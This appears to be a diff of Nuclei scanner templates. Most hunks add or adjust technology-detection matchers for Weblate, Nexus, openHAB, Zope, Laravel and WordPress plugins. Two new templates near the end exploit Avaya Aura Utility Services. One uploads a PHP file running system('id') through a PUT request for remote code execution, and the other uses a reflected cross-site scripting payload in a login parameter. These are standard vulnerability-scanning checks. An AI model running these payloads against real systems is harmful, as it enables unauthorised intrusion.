- type: word
name: yearning
words:
@ -15108,4 +15100,10 @@ requests:
words:
- "Server: Hunchentoot"
- type: word
name: weblate
words:
- Weblate
- <meta name="author" content="Michal Čihař" />
condition: and
# Enhanced by cs on 2022/02/08

View File

@ -4,7 +4,11 @@ info:
name: Nexus Repository Manager (NRM) Instance Detection Template
author: righettod
severity: info
description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor
description: |
Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor.
metadata:
verified: true
shodan-query: http.html:"Nexus Repository Manager"
tags: tech,nexus
requests:

View File

@ -0,0 +1,30 @@
id: opnhap-detect
info:
name: OpenHAP Detection
author: fabaff
severity: info
reference:
- https://www.openhab.org/
metadata:
verified: "true"
shodan-query: http.title:"openHAB"
tags: tech,iot,openhab
requests:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'openHAB'
- type: status
status:
- 200

View File

@ -3400,6 +3400,14 @@ requests:
- "Set-Cookie: laravel_session="
part: header
- type: word
name: new_laravel
words:
- "Set-Cookie: {{DN}}_session="
- "Set-Cookie: XSRF-TOKEN="
condition: and
part: header
- type: word
name: express
words:

View File

@ -9,7 +9,7 @@ info:
metadata:
plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-200
tags: tech,wordpress,wp-plugin,top-100,top-200
requests:
- method: GET

View File

@ -9,7 +9,7 @@ info:
metadata:
plugin_namespace: limit-login-attempts
wpscan: https://wpscan.com/plugin/limit-login-attempts
tags: tech,wordpress,wp-plugin,top-100,top-200
tags: tech,wordpress,wp-plugin,top-200
requests:
- method: GET

View File

@ -1,7 +1,7 @@
id: wordpress-wordfence
info:
name: Wordfence Security Firewall & Malware Scan Detection
name: Wordfence Security Firewall, Malware Scan, and Login Security Detection
author: ricardomaia
severity: info
reference:

View File

@ -1,7 +1,7 @@
id: wordpress-wp-user-avatar
info:
name: Paid Membership, Ecommerce, Registration Form, Login Form, User Profile, Paywall & Restrict Content ProfilePress Detection
name: Paid Membership Plugin, Ecommerce, Registration Form, Login Form, User Profile & Restrict Content ProfilePress Detection
author: ricardomaia
severity: info
reference:

View File

@ -0,0 +1,27 @@
id: zope-detect
info:
name: Zope Quick Start Detect
author: pikpikcu
severity: info
metadata:
verified: true
shodan-query: http.title:"Zope QuickStart"
tags: tech,zope
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: or
matchers:
- type: word
part: body
words:
- "<title>Zope QuickStart</title>"
- type: word
part: server
words:
- "Zope/"

View File

@ -0,0 +1,41 @@
id: avaya-aura-rce
info:
name: Avaya Aura Utility Services Administration - Remote Code Execution
author: DhiyaneshDk
severity: critical
reference:
- https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
- https://download.avaya.com/css/public/documents/101076366
metadata:
verified: "true"
shodan-query: html:"Avaya Aura"
tags: rce,avaya,aura,iot
requests:
- raw:
- |
PUT /PhoneBackup/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: AVAYA
Connection: close
<?php system('id');
- |
GET /PhoneBackup/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: AVAYA
Connection: close
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header_2
words:
- "text/html"

View File

@ -0,0 +1,37 @@
id: avaya-aura-xss
info:
name: Avaya Aura Utility Services Administration - Cross Site Scripting
author: DhiyaneshDk
severity: medium
reference:
- https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
- https://download.avaya.com/css/public/documents/101076366
metadata:
verified: "true"
shodan-query: html:"Avaya Aura"
tags: xss,avaya,aura,iot
requests:
- method: GET
path:
- "{{BaseURL}}/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"
- "{{BaseURL}}/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain)</script>'
- 'Avaya Aura Device Services'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -11,3 +11,7 @@ workflows:
- name: laravel
subtemplates:
- tags: laravel
- name: new_laravel
subtemplates:
- tags: laravel